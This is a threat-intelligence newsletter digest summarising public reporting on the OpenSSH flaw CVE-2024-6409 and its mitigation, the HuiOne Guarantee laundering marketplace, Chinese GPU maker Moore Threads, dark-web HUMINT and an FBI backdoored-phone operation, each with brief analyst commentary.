Bottom Line Up Front (BLUF): A new vulnerability, CVE-2024-6409, has been identified in OpenSSH versions 8.7p1 and 8.8p1, which could lead to remote code execution (RCE). This flaw, similar to CVE-2024-6387, arises from a race condition in signal handling, primarily impacting Red Hat Enterprise Linux 9 deployments.
Analyst Comments: The discovery of CVE-2024-6409 highlights the persistent vulnerabilities within OpenSSH, a widely used secure networking suite. The race condition in signal handling underscores the need for immediate patching, particularly for systems running vulnerable versions. The fact that an exploit for CVE-2024-6387 has already been detected in the wild further emphasizes the critical nature of these vulnerabilities. Organizations should prioritize updating OpenSSH; where a fix cannot be deployed yet, setting LoginGraceTime 0 in sshd_config removes the SIGALRM path that both bugs depend on, at the cost of leaving sshd open to connection-exhaustion denial of service, so it should be paired with rate limiting on the SSH port and treated as a stopgap.
FROM THE MEDIA: A new security vulnerability, CVE-2024-6409, has been discovered in select versions of OpenSSH, potentially enabling remote code execution (RCE). This vulnerability, which affects OpenSSH versions 8.7p1 and 8.8p1 as shipped on Red Hat Enterprise Linux 9, was identified by security researcher Alexander Peslyak (Solar Designer). It stems from a race condition in signal handling within the privsep child process of the OpenSSH daemon. The issue is closely related to CVE-2024-6387: when the login grace timer expires, the asynchronous SIGALRM handler invokes functions that are not async-signal-safe. Because the race occurs in the unprivileged privsep child rather than in the privileged parent that CVE-2024-6387 affects, successful exploitation yields code execution as the unprivileged sshd user, not root; the immediate impact is lower, but it still gives an attacker a foothold on the host.
Crypto Analysts Expose HuiOne Guarantee's $11 Billion Cybercrime Transactions
Bottom Line Up Front (BLUF): HuiOne Guarantee, an online marketplace linked to Southeast Asian cybercriminals, has been involved in transactions worth at least $11 billion, aiding in money laundering and pig butchering scams. The platform, part of the Cambodian HuiOne Group, provides services that support fraudulent activities, including moving money, developing scam websites, and selling tools for coercion and torture.
Analyst Comments: The exposure of HuiOne Guarantee underscores the expansive scale and sophistication of cybercrime operations in Southeast Asia. With connections to high-level political figures and advanced money laundering capabilities, HuiOne represents a significant challenge for law enforcement. The platform's integration with mainstream financial services and use of instant messaging channels for transactions highlight the evolving tactics of cybercriminals. Collaborative international efforts and stringent regulatory measures are essential to dismantle such networks and curb their operations.
FROM THE MEDIA: Cryptocurrency analysts have unveiled the illicit activities of HuiOne Guarantee, an online marketplace used extensively by cybercriminals in Southeast Asia, particularly for pig butchering scams. According to Elliptic, a British blockchain analytics firm, HuiOne Guarantee, established in 2021, operates under the Cambodian conglomerate HuiOne Group, which has connections to Cambodia's ruling Hun family. HuiOne International Payments, another subsidiary of HuiOne Group, plays a crucial role in laundering scam proceeds globally. HuiOne Guarantee's platform is utilized by thousands of merchants who offer technology, data, and money laundering services, accumulating transactions totaling at least $11 billion. While the marketplace ostensibly caters to real estate and car sales, most offerings are designed to aid cyber scam operators. These services include moving and exchanging money, laundering proceeds, and facilitating the creation of scam investment websites. Additionally, merchants provide tools for coercion, such as tear gas and electronic shackles, to imprison and torture workers within scam compounds.
READ THE STORY: THN
Despite U.S. Sanctions, Chinese GPU Maker Strives to Compete with Nvidia
Bottom Line Up Front (BLUF): Moore Threads, a Chinese GPU manufacturer, has significantly increased its datacenter AI systems' capacity, now supporting clusters of up to 10,000 GPUs. This expansion aims to provide an alternative to Nvidia's AI accelerators, which are restricted in China due to U.S. export controls. While still trailing behind Nvidia in performance, Moore Threads' progress marks a notable development in China's effort to build self-sufficient AI and computing infrastructure.
Analyst Comments: Moore Threads' leap to 10,000 GPU clusters demonstrates China's determination to circumvent U.S. technological restrictions and bolster its domestic AI capabilities. The strategic push aligns with China's broader goals to enhance national computing power and reduce dependency on foreign technology. Despite the technological gap with Nvidia, the ongoing developments in Moore Threads and potential advancements in domestic high-bandwidth memory production suggest a growing competitive landscape. This scenario underscores the geopolitical stakes in the tech arms race and the strategic importance of self-reliance in critical technologies.
FROM THE MEDIA: Chinese GPU vendor Moore Threads announced that its data center AI systems can now support clusters of up to 10,000 accelerators, a tenfold increase over its previous capability. The expansion was disclosed in a statement to the South China Morning Post. Moore Threads, subject to U.S. export restrictions since its addition to the U.S. Entity List in 2023, has developed the MTT S4000 chips featuring 8,192 vector cores and 128 tensor cores. Each chip delivers up to 100 teraFLOPS of FP16/BF16 and 200 TOPS of Int8 performance, with 48GB of VRAM. Its systems initially supported clusters of 1,000 units; the new advancements allow up to 10,000 GPUs to be interconnected over high-speed networks.
READ THE STORY: The Register
Items of interest
HUMINT: Exploring the Underground Economy of Cybercrime
Bottom Line Up Front (BLUF): The Dark Web is a complex and evolving ecosystem where cybercriminals conduct illicit activities. Threat intelligence professionals divide the internet into Clear Web, Deep Web, and Dark Web, each with distinct characteristics. Understanding and countering cyber threats require both automated tools and Human Intelligence (HUMINT), which involves law enforcement officers engaging with cybercriminals to gather actionable intelligence.
Analyst Comments: The exploration of Dark Web forums reveals a highly organized marketplace where cybercriminals buy and sell services. The persistence of these activities, despite law enforcement efforts, highlights the need for continuous adaptation in cybersecurity strategies. The integration of HUMINT into cybersecurity operations provides valuable insights that automated tools alone cannot achieve. This approach is essential for staying ahead of sophisticated threats and protecting against network attacks.
FROM THE MEDIA: The Dark Web is an anonymous and closed part of the internet where cybercriminals thrive, conducting activities away from the eyes of law enforcement. Unlike the Clear Web, which is indexed by search engines, the Dark Web requires specific software like Tor for access, offering a higher level of security and anonymity. Tor, originally developed by the U.S. Naval Research Laboratory, allows for encrypted communication across multiple layers, making it difficult to trace the user's IP address. This secure environment has made Tor popular for illegal activities, including selling drugs, fake identities, and hacking services.
READ THE STORY: THN
Incorporating Human Intelligence (HUMINT) into An Information Security Team (Video)
FROM THE MEDIA: Incorporating Human Intelligence (HUMINT) into An Information Security Team
"For criminals, by criminals:" How the FBI Tried to Wire Tap the World (Video)
FROM THE MEDIA: A special phone, made from top-to-bottom with privacy, hidden apps and encryption to protect your data from prying eyes. Sounds great, right? There's only one problem: It has a secret back door that funnels everything you do to law enforcement.
The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.